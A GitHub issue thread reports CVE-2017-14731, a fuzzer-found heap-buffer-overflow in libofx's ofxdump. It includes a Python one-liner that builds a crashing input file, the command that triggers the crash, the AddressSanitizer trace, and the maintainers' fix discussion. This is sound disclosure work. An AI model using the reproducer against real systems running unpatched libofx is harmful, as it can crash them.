New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2017-14731: ofxdump heap-buffer-overflow /usr/include/c++/4.9/bits/char_traits.h:263 std::char_traits<char>::length(char const*) #10

Closed
fgeek opened this Issue Sep 25, 2017 · 3 comments

Comments

Projects
None yet
3 participants
@fgeek

fgeek commented Sep 25, 2017

Hello,

Fuzzed with: afl-2.49, afl-utils
Credit: Henri Salo from Nixu Corporation
Notes: Thanks to Kapsi internet-käyttäjät ry for providing fuzzing resources.

You can create the reproducer with:

python3 -c "import binascii;print(binascii.unhexlify('3c4f46583e').decode('ascii'))" > char_traits-heap-buffer-overflow.ofx

And run it with ofxdump:

./bin/ofxdump char_traits-heap-buffer-overflow.ofx

LibOFX INFO: libofx_proc_file(): File format not specified, autodetecting...
(Above message occurred on Line 18446744073709551615, Column 18446744073709551615)
LibOFX INFO: libofx_proc_file(): Detected file format: OFX (Open Financial eXchange (OFX or QFX))
(Above message occurred on Line 18446744073709551615, Column 18446744073709551615)
=================================================================
==14513==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000ef71 at pc 0x7fac88506b4e bp 0x7ffdbe1202e0 sp 0x7ffdbe1202d8
READ of size 1 at 0x60200000ef71 thread T0
    #0 0x7fac88506b4d in std::char_traits<char>::length(char const*) /usr/include/c++/4.9/bits/char_traits.h:263
    #1 0x7fac88506b4d in std::string::assign(char const*) /usr/include/c++/4.9/bits/basic_string.h:1149
    #2 0x7fac88506b4d in std::string::operator=(char const*) /usr/include/c++/4.9/bits/basic_string.h:563
    #3 0x7fac88506b4d in ofx_proc_file(void*, char const*) /home/afl/src/libofx/lib/ofx_preproc.cpp:326
    #4 0x7fac884f4a82 in libofx_proc_file /home/afl/src/libofx/lib/file_preproc.cpp:94
    #5 0x402923 in main /home/afl/src/libofx/ofxdump/ofxdump.cpp:491
    #6 0x7fac87929b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #7 0x402dac (/home/afl/builds/libofx/2017-09-20/bin/ofxdump+0x402dac)

0x60200000ef71 is located 0 bytes to the right of 1-byte region [0x60200000ef70,0x60200000ef71)
allocated by thread T0 here:
    #0 0x7fac8881173f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
    #1 0x7fac88500737 in ofx_proc_file(void*, char const*) /home/afl/src/libofx/lib/ofx_preproc.cpp:311
    #2 0x7ffdbe1215bf ([stack]+0x1f5bf)

SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/include/c++/4.9/bits/char_traits.h:263 std::char_traits<char>::length(char const*)
Shadow bytes around the buggy address:
  0x0c047fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[01]fa
  0x0c047fff9df0: fa fa fd fd fa fa 00 fa fa fa fd fd fa fa 00 03
  0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Contiguous container OOB:fc
  ASan internal:           fe
==14513==ABORTING

@fgeek fgeek changed the title from ofxdump heap-buffer-overflow /usr/include/c++/4.9/bits/char_traits.h:263 std::char_traits<char>::length(char const*) to CVE-2017-14731: ofxdump heap-buffer-overflow /usr/include/c++/4.9/bits/char_traits.h:263 std::char_traits<char>::length(char const*) Sep 25, 2017

@alteholz

This comment has been minimized.

Show comment
Hide comment
@alteholz

alteholz Oct 28, 2017

Are there any news available for this issue?

alteholz commented Oct 28, 2017

Are there any news available for this issue?

@cstim

This comment has been minimized.

Show comment
Hide comment
@cstim

cstim Oct 28, 2017

Collaborator

On my system the input file doesn't run into problems, neither with plain starting nor with valgrind. This is from git, c426e22 (released as version 0.9.12). I've committed fad8418 which should avoid some of the problems, but since I can't reproduce orgiinally, I also don't know whether this fixed anything.

Collaborator

cstim commented Oct 28, 2017

On my system the input file doesn't run into problems, neither with plain starting nor with valgrind. This is from git, c426e22 (released as version 0.9.12). I've committed fad8418 which should avoid some of the problems, but since I can't reproduce orgiinally, I also don't know whether this fixed anything.

@fgeek

This comment has been minimized.

Show comment
Hide comment
@fgeek

fgeek Oct 31, 2017

@cstim fad8418 commit fixes this issue, thank you.

fgeek commented Oct 31, 2017

@cstim fad8418 commit fixes this issue, thank you.

@fgeek fgeek closed this Oct 31, 2017

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment